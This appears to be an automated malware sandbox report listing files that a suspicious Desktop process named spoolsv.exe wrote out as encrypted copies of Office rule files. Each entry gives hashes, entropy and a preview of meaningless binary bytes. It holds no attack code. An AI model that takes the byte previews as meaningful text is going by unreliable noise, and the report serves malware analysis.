                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..0.Z.N.2....d1=f.1.`r...v.!S.....~....1hT...V..w...<.";...4.L.{.h....'M^..a...P.....*..4..Kk.?.Zy..v...F~Xu..0...).e...E 0B.\..6.....x....0....W-...Q|v.6nom{..'....@.j3).}k.)....NKIPa.^..^.7.x.)\.@H:J..%&..i....q...z....x.J"............=..5._*...A._..R.V.E....$......E....R...:CN.i.N...m7.[.3.}.,G.:....k...V..0.n...bh_.b..N.x......E^.....Z`##.u|...^..). v).Vp.~....F^...Q....T..."f.^....M8h+...M.....U....'...?.Y.....>.2l..@.Y'............s.......I.n).O.~1.Z...[..".EGf....6.,z.X....*...T...-..m...8.t.g..

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule11502v0.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):992
                                                                                                                                                                                                                                                      Entropy (8bit):7.811372011724441
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:+++Xiy8X90kd2NSu4tR4ScmFOqLB5c4CIPP7xuuRIg3qp5Jj9:++aiy8X90kM3cRwcOItC8P7ouRp3qp5r
                                                                                                                                                                                                                                                      MD5:C5E29A36A0E5DF9F4212CE751FB26EC9
                                                                                                                                                                                                                                                      SHA1:C4F109137443B064CED8C70746FDF190D98C41A8
                                                                                                                                                                                                                                                      SHA-256:8397849FD4D9350E0B6F96B6F6027CD2741FB55CA68CDB75E12A8E8A7AE7DAD5
                                                                                                                                                                                                                                                      SHA-512:1CDFD3CEA6EBFC2563FA9EF49D934DB6871CEF95C2F12139CEC90D30C590EAAEAEFC205CC50010E56B44A6507C6C2CE7EEB3514C1E01CD0557DA66D5B20038F8
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..0.Z.N.2....d1=f.-q..m....R#...B.pC..9K..Er..5I8\X....BU.\;........L...S.,.;E..QW...e.s:..=[.@.q...1....0...H..%..p.F.e(9x.`O.].xU2.Y...........U.v,.,.hj.Z.!.h.<..S..8......B't*m..-MYA..}...j..;...C.y.".k%..S..b.6\.....[,jY.$G.K..."[u..CR..q.NB..t&.....V<#Y.W4...=..J....}.J..l...K;......w....e..."..#5....H8?........w......5.a;s.....d.7! w..V...[do./{....Dm....d$6H._4....I...ThM....4G..4.B..#.o....&..T..o..9e/9..............A..w8UUGl....NG...g.....k....4..t..L...OWl..M6W.0....(6....%.n&R./..:.aF..-..z$Z......`........N9.{JlR..e.#...4..cm|.....K......4.I(...i..~..3.*...Z.Ea.a.%.p....{h12i./f..2..!z..A....../.&..|..t..hc..b.j...rn.e..DM.S.LZ...^?...(..~.s.!'#$E/...K........h..Y..R|..D(.g|..?#.K.m.`?........-8.f..gAP.e._.p.rS`..A....B.....em.-..{DYM..7h/.l.Q.R..5%...0E`.h.....h..ki2.3.........`*=...]S"...pDI..'.E..!4...*..U.D.f,.!,.....|ff...A6.k...T....T..`.+u..T.&.<..><p*.0..U.%c.u.i.v

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule11504v0.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1104
                                                                                                                                                                                                                                                      Entropy (8bit):7.844677933998416
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:++f7L6CYV85Hh4P1oLWYQCL72Sxovszh4nbkAGkiZv9MhOq7VS:++6CYV8/a1UWYQCLpxyA+nbniZvuhOqc
                                                                                                                                                                                                                                                      MD5:6536BB085222BDB4D009886F6CD36615
                                                                                                                                                                                                                                                      SHA1:91D3086254456654D9F289EC32DF835ADB6044A2
                                                                                                                                                                                                                                                      SHA-256:12F7607DD69B78AB4989C2786E07860B59CA25981D019F4D8D5AC05D23AB0511
                                                                                                                                                                                                                                                      SHA-512:1C3A39EFF871517C92FDB0CE2CFBE59AC43C951C2A7217F874B15066B51349174EEA63C16C543AB7FED28D4217E3E38CCBC245D1997B99C942B07E30454CF3E7
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..0.Z.N.2....d1=f.....{w&s...0.....:...o'...9...z....c=.#..t.|.0.*.....+|L.\](....<........a&.G...;.u.IA)...,/0....A...Q...{.........=.8.O.8.t...= |.....{..!.N..h[.&>.....eK.n....].....X....P..d...... .}].X.L...g7T..aU.r........h.7.ky. ...A.../...."..*.......{u.nT,............C..?./Ox.eA..>t.........".W....&.R.P`?.u...uT.o.).2.....W..U..fA.?.]...z...x..=P.s.../...!CU*..:E,.O.n[...$......T.A...F..."V.,.8292..AuUg/*.7|........m...4d..%w...!..Gp3..[P$.:.}.lz.>T1.."d....m.4@.+.......:.L*...a...0N.bM..wn"{\......x..bO...(....:..>M:...Z".I@...2..V.qn....u9l...q 5N.u_.CR.}..:M.@.g.....*.(.....i0].o....9..A....e.o.ES..W..U.....S.'..T.....Z....M.7.P'Z......Y..[..8TM.Ds..<.&^.rJ-?N..s....Y..!5I~.....P.r..~-.........V..'......&Z.......J.\.;[.d.th....R!wl.'Eb.p...XQ!.,....1...,..\...6.S@@..G<.P.#(..w".......m.}...\v...=.._...{.@.i..(.......N..@.]...a...#3D$.&.....zqm.g...D..%g0..x..[.Z.).. ..2%~;...A......4..Z.B..>U.n,)@o..N...9.D

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule11514v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):6800
                                                                                                                                                                                                                                                      Entropy (8bit):7.975988433162313
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:192:++rZ0obF/Q58bfwsas60IDMJHQOCjsL+5r0QVZ:Zt/TwlsfoULuhVZ
                                                                                                                                                                                                                                                      MD5:487142BB4072EE3394339D95A4486A7B
                                                                                                                                                                                                                                                      SHA1:8548F65C4F9770DDA4382C4DB0C027B1D1236CB5
                                                                                                                                                                                                                                                      SHA-256:FEAACD135B7EFAFD5EF66101BA5FBA1E4549D43BC30FE661C48EF69043CE4CFA
                                                                                                                                                                                                                                                      SHA-512:F7D3CF7BA7E542F262E7110B0DA51584E5EAF5751632229510ED0316510BE01075D1E4C534165AD56B47B5091FE25171576D56D5439F28D0342C7878D0387890
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..0.Z.N.2....d1=f..w.|..'.R...0..18In.U...W*;.bV8.I.*y...r.[.8..g.`.p../..xE..K.......u.9q.C.id|1/.n.....-.Z.8.'..`.-...NRv#..Y.]7....mvGL.?.....L..+.^...}!........0.b..25OE.$.A3. ..56..1.l......E....)o. ....YlU.......9W..VA.tH%W..e..R..0{.SG8C.....[.b.I.V?.U.S.+..$.E.@..[...N..<M&.(.p......,h...#...Jp.........n..7~].....O(R&.g..o..e{..5...&...[..A.=...9v....C/.@.)$...E.@.....i.V..Pc....H,.%tM.+.B.&c..!U.K..wE...P..a.Q..{........}...d}....{...........yL............i.K..9....#.1....44...te.B}.ZGN.@.D....i=....R.....S=+......Z....w6....c....a..f...)=.....%v.....m.[.,nvR.2|.W...u..{........v.Z...z.edFt6....S....>....Q..1c.o........M.Az/..&.H.o.>.)..,..b.V...t.Ok....WV....D.Q0....d..1...{$.Q.> ....+...'*.2n.bD..8.&..]_E.i.5..{.....f.DHSj.V.PO@..M7...c....-...b.[.}....&.Z>r...#..Ag w.\.P..1.4}{.<LBR}9...hn.&.....C.%........g..*....uC....b].3')..o...+7$.k(...u.....5.;/.._.....z.;.........."...s.P.B.RF6.f..sZ2.u

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule11659v0.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):432
                                                                                                                                                                                                                                                      Entropy (8bit):7.557518862192679
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:6:fmcorOJ7wnIvbuq7WNuQKFDxGMtrKiFa3H/kyAsvvyHUGnJAgbNxXZ3WDoTu0nUx:fmZaJ7w8oN2FDxPFrSrZeNxXZJueG7l
                                                                                                                                                                                                                                                      MD5:280FA2925C3A6B1DE3274607C10FF43E
                                                                                                                                                                                                                                                      SHA1:9A24B1EBC0C56BB51C91572F65C2F9DC3CAC5493
                                                                                                                                                                                                                                                      SHA-256:BDB2FFEC9BC982C398079FCD266ABF5DDB98C812AC282CDD6BDE622A2EF372B9
                                                                                                                                                                                                                                                      SHA-512:C68CC111B04E394DE98D25546990972DFB7E2170776EB387783FC58CBAD5F841EF15D279F64C72A57198C1F93B72CAC7C40603CB95509D5E8D54DA3E3CB83694
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..0.Z.N.2....d1=f.M.9Q..h.:.F....?..0..m.N........av..B,4\.Z...Z.y.0$.....s..e......V...0......*.pUS.|.....P....d>..t..1._...n.i.~2G..zq'C..9...6....8....,.,.....'.2.......+...h,...`.Q...K..Yh...VU..-...u.".T......w....o.ka........P?.V..."..0Q.k.U...@.Zr.6......'..|D....7.d...T....#............E..D..<..3.xf.4j{q.4bJ.+.D..31M...B.<..1J.O..>....*n..._.f.c$.....5....G._..*...b3q+.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule11701v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1136
                                                                                                                                                                                                                                                      Entropy (8bit):7.820732848395348
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:++zrZAik8Bf+Z8gILATieTOs28pjhaFsbV5tY5TZM:++zlAuBf1g6cFXw6bVB
                                                                                                                                                                                                                                                      MD5:26D47511E0BC8604967D9A07D384674E
                                                                                                                                                                                                                                                      SHA1:7603E462411BCF416880AC7F60326A392A528301
                                                                                                                                                                                                                                                      SHA-256:512E780E36EFAA9DF8EC0A5368931AA2659680A5E15D07C73D98FE994E041BFA
                                                                                                                                                                                                                                                      SHA-512:C0ABC1418CD35643CF72EE2452FB2CC5763711C947B5DC9B08BBB576D48EFC604EF195287C15143DEFFDDFD40579B077ABD065376F801676D07113F475B3058F
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..0.Z.N.2....d1=f..0..59.............BLG.=..@v.w......a:...e...V(.}p...7..>..Gv...i@..,.D.H...#r.c.4p...Tp.VP/.1...DM....i..0....E.z.....+...&b.3Y..."S}..cjA..M.)...+..z..M....!..O...7...DZ..Y....=.IJ.k.Mg.".#..5!.L.o..h.G.......<s.....\l..4...:......._....rF.!W.,.....C.....+.lA.~.ZL...$..(].5.Up2S[T..bO./....c.y.3.....$.Vx.....B...N....'...F..eC/".t.....L.?.gD.G..e...b&:....0eM....!jx......!.T...By[.U.......i.....L.*<?i..g.....W. ...-&..|..#.......e....E.5^..BK"J.....Oa.!@n../.~.O.#.. k...... q6' .]rAuP...23H.....k....T.....Hkf.@y..X..H.S.y.........>.$....H./.=.b...z.[.Z.e.`c..Jm.W..[.{..S0.x~_g-..T3.....6nk...S.q.I..(....x`.r....;..6.....<.t..7.....&C........PM........} .QT..)e!P...1.....5.E+K.,..).....+.4k.^..V.\.m.P..ET..#t.c+.7.A..!GM2...c....@.ohKA8.....i9.:\..>...F>...t......l.J....:-.......!.:]b.,..*Bw.^.>)..s.7. y7}....).....M..(x*...........Z....r...........`Ns.....vdi...~.....AS. ...o!.Ac...z....!7...

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule11705v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):3184
                                                                                                                                                                                                                                                      Entropy (8bit):7.937488365743703
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:48:++5qmsZg0g3Vh+9iKtnk9WN4Q50erHzYRMS5Zn20Lcp8uuSRPJkz5w9zPy+Hm:++Q20g3L1K1k9u504cjn1+uIukTG
                                                                                                                                                                                                                                                      MD5:F2DCD849C2AB9905A42BD13113BDF644
                                                                                                                                                                                                                                                      SHA1:42B13D6A1EC52F0BA698409B0228913863BB78E3
                                                                                                                                                                                                                                                      SHA-256:1D04A97D718B47CB385CEFCF6A011DB40719EA2C55E364A43B657CCF3266EC78
                                                                                                                                                                                                                                                      SHA-512:C8D8B37CD7898F13C20D00BCF19C39E8F95461637049799AA653C59C896BC7E7FE20C26D5D053978D5C4C2CEA372423086C957E0309CAB4CAFFE199A15ED0499
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..0.Z.N.2....d1=f...0I.B='y...?.T...[.Y...(....~...&wB#UAb<<e..'+..Z.<.K?.bo9d....[f......m...V..u-.}I...>9..[..BH.9...4..V.q.....{S....W>.*..%<l..:5......].G...(..U.B7.K.f.[v.v.Eb7.~.x.B.>.....@..B...B...|D|@>Tx4.b..O...o../...............'8E3v._.D.8.#V.6....K.+UuBQ...$.|(.2..K...t....%?....3z...ocO...l.id$7..C'~....z..1Yt..^i.g$O. .=..*0..r..>.s>...K2..(eT..5...x../KC..\G.|.d......l...ZR.thO..U..)=$..(..44....sg!.v...G..{...t..N.I.ks..HL...;.L..Lf....j..!..pO\.}Z."......K..7...>.yy0...`...f.2[L..t.C-;;9.[..'a.j..-zt(H.s.q.......m.....JF8..m..|..~"3..7._q^^.....&&.yxR...m....S.Q.X3..5.T.~q.4..8...m....-.Sv-}68..\..jqju./B.J.}... ...J.".P.I./..-.q.......4...o.5]m....~.8...s;.kvE...u.m.......^.j...I...sBd......;l...I.}b.c4.<.R.(D...m..I...P.w0X......D...-..?N.. ../....%F7b..n......w...?^F..:..t#....G..GG....{..W.m..,t....U.a.D..89@....r..9..7.'.Q.}.. i...afI..CB.h.X....P...f*..p..2.y....o..zLR=^..'..n.G.+ej.0K.>b.*

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule11710v0.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):640
                                                                                                                                                                                                                                                      Entropy (8bit):7.696707912744506
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:12:fmZaJ7whlSxk+36O8Y4QMElnu5gI4CNPcWjTYfibjkwjMo1aoQQayqZuKvvZn:++UMv3786vBC7jTPhfQry4nZ
                                                                                                                                                                                                                                                      MD5:A68277ACC92656F1515FED06A9CD4C4C
                                                                                                                                                                                                                                                      SHA1:97BB985C24880FAC4E3BCF760BBC155B3F78B315
                                                                                                                                                                                                                                                      SHA-256:D4C63ACC82EA44A60F6B8705CC6C8BEAE6C2CD29AEB89035BC56A12C56B7A036
                                                                                                                                                                                                                                                      SHA-512:2943C9DDF3FAC5030647160A4B8F7728262296E75364E912D18B1D21D3673DB6FF5727F1BAC983A6269C2FD5694E06759F33438599CA12C090488D8AD7805BA7
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..0.Z.N.2....d1=f..Kb...`...7...D".!...WC8fJl.......x]o....i=p.[.8.b.|}xF4.. .f?....%..k..> .&.A;..d.<.G.q..kX..O;..<jm..."....2n...._.".$=....~...=#C.),.d....4Ne'x......].....Y.*...]M.....1......Ki.......I..)..8.a.....!..+a.'I.[.Dc..i.b7..D.IL$.A..t...=.W..0...+j.Q.S>./.W..+.$..Y.dKf.......g-...J..L.r...S=\./P...N..u...t;.....Xa..z..6..^..Z.......8s.-..0..C..Wb<.....sqX.@.........].....\m...nx.>t.*]oF....5-..2.#RS+....9.#.7..v.".Ba:....f..p..`.6z*.5O.G......wB.nu.[Q......>..'....Ym.........L.."B...4.w.0....,....nR.....)_..C&o= .f~...y.$~...,+.B.n@jBr..W*U.mv........`..j.x....._

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule11767v0.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):2656
                                                                                                                                                                                                                                                      Entropy (8bit):7.933385269508337
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:48:++JusjLhjuUqztjfrijhcLB8gUvjfT8NgL4srzXzJmHgXZ3mgdDFMhF8:++0sjLhjuUAtPB8gUvf8e4y6CZWgdp
                                                                                                                                                                                                                                                      MD5:64516A98764DF4F17ED3C517E07B7EE2
                                                                                                                                                                                                                                                      SHA1:31D96AB152561F1C2CE87D3788B6DC1D51242949
                                                                                                                                                                                                                                                      SHA-256:D0B814B5AAC523F62454F28942557F47A27D0506E1DAA54F515E3A805FD5BE7F
                                                                                                                                                                                                                                                      SHA-512:CCFDF44E68C2152586DE8660BBE064EC83FF71322BF3AC8403E95C8482CD40FC3B8DE96F14FEE4AC7D74C00370CF5DA64D2CF373ED201664FBA30C131E7BB6CA
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..0.Z.N.2....d1=f.#y|.r).......*)N.q.{...Rs.......>{65pg.5.U(..F....%.o.j..2q..8.M.(..>.gWG..g.6.2G....~....{[.M-..~.U.A..W.f$.....V..v..y...C.....c.8`.G..vg.....y.....j...@.z.....K..2:5]D....lV....6N].?.<a.0..tk....la6b.6&......."..>k.`.&w8K.?.....\..ADb...@..{].;{..i...<.`..~......u...jW..v.......D.......Q.y..&U9.j..$.I../...C.........Mw..n.\{).......FN.........".jT..l\4.Tf.....6I....a.K1.B.Z.Uw.:....T..g..Bc<.....pCj.....H...N......c....o..:..)7...x......A).1.4..=@x...0{IY..a[.,`g.M..$.X..%........%.o.:X.n:@6W..\.....v. b..........E..S..8..X.U.H.........[..j,h......9$W....zb....M.....G...|L.O.....=... ..:.h7..\..g...N......d.).-...Bz...J.>t...[..4.Z..%Gu%....5.x.Hc.4..Z..J.^-.]....#+..D...V.-..x"....E}.sZ.,~.A4.....].{T.&9c^*...'F.$......3y.,9GJ.d...*.)7CW..Xa...Ov.X..iN..s..f,...`..I=-.....)@...>.z....{...u..Z..g..,..0..k...|h/.....N..#....../..X.}.....C.vd w...;..y....'...w>n.v.\.5.\i.)$ci2.wT7...uw.u..

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule11768v0.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):2160
                                                                                                                                                                                                                                                      Entropy (8bit):7.918797845442585
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:++YSXH5uYTd2EF0WrE4TVfoCoGnvk9tEckYWhcCIo1gkLUODGEGKcLaPqlJZbMPL:++YSXEkhFrE4TRc9t1qUFiGEtPq/2Pce
                                                                                                                                                                                                                                                      MD5:2543886F906B1975BC8B4AEBC6FD2FDA
                                                                                                                                                                                                                                                      SHA1:632C14A88C4F5B7CFE773DD7F9B677FEB7B945FB
                                                                                                                                                                                                                                                      SHA-256:0B5C46922C94143A51789286BB2F2F2F240369F88264D7B84AF9E8197C85181A
                                                                                                                                                                                                                                                      SHA-512:28385F0FF60A7169E027AA105329E62A3C3CA79993D14AAFE9512DF3E41E0022E74202599CF40F2AC05DDCC62B79CB761B47907F6728D9C31B95C7270FDD6B60
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..0.Z.N.2....d1=f.T..A.L.....R..7FW.e8....;4.+{.....j.^..!.y..?3s.s.6..(.r.m.....;..\^s.P.q......h....cZ.Ik.M...!y.........a.Y.YL.Y...s\L/.M..c..a.R.M...<..K...$..AP....&.L....c....t.....#.y... .m.@M.6G2.I1<.(.T..z.X3...jh.r;..;..(...aa..EO.6I..t.......2C.3.w5A...8...H.2......43r..8.....dp~Nd.rr...vn...hh.wk...,.....(.|b...$.22z\..}%.=...|...g......#d.'.......&.DQ..|..*.Z.]...7./..@...C{.xJ.v.".H.."....FE...&.=.....0......U....'.<':#Ln,:..E[6=.A..G.O.'y...u....E@.V~\...g......5,....q+.?p.^o/...({....w..{.j.]..R..9....OJ..{v....p....^..M..<....Y..1i..G6......h......ZI...wS.v...J.9.#.@ef..[....qY..~........n.hT.l.j....k&{......xA.|~;.EYi...D.......*vF7..B..`...TCM...dy..x...a8{I,.QL#.M..).G..y....."A|.....].Eg.....@.o.)9;j!.%...bl..O..Rt.z.-.;..s...-.3.oF...Jx.K..he.qh .R.J...\...!...N...X......sL..]j.3.....e...x=...M.+.F.......|..8.f..j!(?}....8zzlYa9...%..>...qx....i.1.<..`7...q}...R....x.h.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule11769v0.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):2800
                                                                                                                                                                                                                                                      Entropy (8bit):7.940589934354857
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:48:++84qXYNZQO9opgK5rCSsB15ZZ8aJKli7MCE5bGK3cW86WfdpHV2YXYic8kRrTs/:++84XQwZcsB1GoVT2kx6adNcYXYP1Rri
                                                                                                                                                                                                                                                      MD5:79ED1305DFECA8C2454FD71D4F95C6E9
                                                                                                                                                                                                                                                      SHA1:9937A9015C48404C7B4EDFAA1762BFF934B99D13
                                                                                                                                                                                                                                                      SHA-256:9BB3432BD71F3CF63B88BF494B3EB032C0A0400313F27FD9EDA9E5253D5091EF
                                                                                                                                                                                                                                                      SHA-512:8691568A467A18391E2C372CA212562B16E6C2920048DE7A16C583C59C1CFD300FD103C1D515AA956149AF5B293356C846959B217724D79CAEE840B17849EA51
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..0.Z.N.2....d1=fpc...C.,.C.$.WIx`=V3.Z.......o.).>.94K..X.Yb.Q=..../...aj..w..r........`:.....x..E..mB.|.u...|.5.c\..B.....A..40..`.......R4......F...3..."...........A.7.ob.'...../79h8...+..Lh.p.}..7......v....`.W....u...tZ...j.~al.H....T........>...m=.F.....0e.b*....'k.7.u.;L:(./.5.US[...y...<UlE..%..\.BK).6.....|....~.m.Z..,.k......r..K.9fY4gzm.........LGFO{H...~.}..5 #....jS.4..D...9..[..&..p.8w0........Y#!..yn.{..h}{.G's...%..."...Oa..C.98...R)..zX.*&.. ..A.L..Q.....K...w;P..&...w7...n.`....5..p.....%..........o5p|"....N..,.,.b......c.F..z..5....2.8Uw....#......3.....4)....jnfH%.{.X1...%9.h...qG`....P...gX.....'.Z......0<B.X...'v...^..zZ..j'.#C_..../.P.?.7.R....he..!}..k....Yw.._.5)9O...(....b.....v4...I..<P.u.h..O..q..+....vN_.........f?..F.zX....R.D.^_.-J..'R..?/...j2uC......7I..gQ..aa(..M..V".,:=-.R.....V .D8.4.B..{...D...........d.T.n.b......p..c..Dc..F.7....[}..9u}F$dN#[k..>...;..U.....b.;

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule11770v0.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):4640
                                                                                                                                                                                                                                                      Entropy (8bit):7.960361794023655
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:96:++9gcZDTkdp2tiSaDD8UsuZCPSYyqCH+YlVD+C0tvEgSQCa:++mcZsdnDD8UFQPSDH+Y/Dd0oQCa
                                                                                                                                                                                                                                                      MD5:372BAF5BAEA6241EBDBFAEFF3149C9A5
                                                                                                                                                                                                                                                      SHA1:06AB478E78901E5C5DB949C6B759CBEAAD01C69F
                                                                                                                                                                                                                                                      SHA-256:491FC5BAB30B4348C7920164DCCE1992C6EF6863266921B3E41888B5560F2A6B
                                                                                                                                                                                                                                                      SHA-512:F391C1F63AED8A0D45CE4403D3FA12A2A91E01F45C2333B5B25B781103ABEA7F9BED65651D11A31E84B8FEA78D80954C5E7BF810C63E48D137E5DBA4A1E56CCF
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..0.Z.N.2....d1=f{.M.e.q.(.....3"x.1.an3.s.[C;o.f..&.4......`.},.8>.lI.rboq_..n.]*.....Y.D`.t$.......<.....[.......m..;....G..;..o.6.F...e.%.:.jL.x..]..A.[C.m......5....H.....A0%..1}4...j...Dj..1....z...v.........-...c~..7vz.S....w..y....p@.L'.r.)....L..S.G....c..d=..!X...6|a.R<....KD...f.&%4.<..J.i.......K..L.k.(Q..w..7.?.R.1j..u#4..@..-n....<r....d..h..9e.GT.ov..&B.\..ZZ$.CO}...L.S....4Fk...vA..q/eO.8...v.3*....5.e,.n.~|..p.....jg.~....1}..%M..I]D6... 5y ...]...,..a.o...H.a^.....n...p...<.D^@D..\c7..0..`QB.....`...\.J....e9.+.m.3..f..c.~....7.K>.pz.s=.7..e4.NZ..`<.Cy........te...j.T.....L..?.SS..=&.uu.W..u.z...vE..K..NM.s..%DD.X!.}A...........*`swli...s....t.........sd.......9.v...G0n.MiV..[..>... ..ma.NK..KO....G.t.;..us.B....f...q.......9.. ....6p......s.....xpU..f"*...X.!}.....wk..#^.....Y:.z.Y.YI..........S......l..U......#5......f.c..tE.82...Uew.nl%)v0c cVB.d...2.:...L......d..L.u.$>0C.G.}.i@

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule11771v0.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):7264
                                                                                                                                                                                                                                                      Entropy (8bit):7.973537503928079
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:192:++sWEMcVVFy+QsSnZ1P13vJSyA8rbWkMBw4wIM1lt:CVFy+MZv3v3TrK5Zwft
                                                                                                                                                                                                                                                      MD5:4577AA50CAE295C03C696F16C0D3F4BD
                                                                                                                                                                                                                                                      SHA1:A28675A5AA25871EA5D04313B5070233E07C5739
                                                                                                                                                                                                                                                      SHA-256:1FB723FFCC0570259E91F7516D714CCF61002B9E873C0E82DBA9A2A4A5D87309
                                                                                                                                                                                                                                                      SHA-512:C40CF4B62D2D6D6680AF5BF97C40FFF604DF45F8F72B6478D49D6B347E36606B6CF77B81848C05E45057660557AAF6B3C48D95A553F5600643F03B22520407CA
                                                                                                                                                                                                                                                      Malicious:false
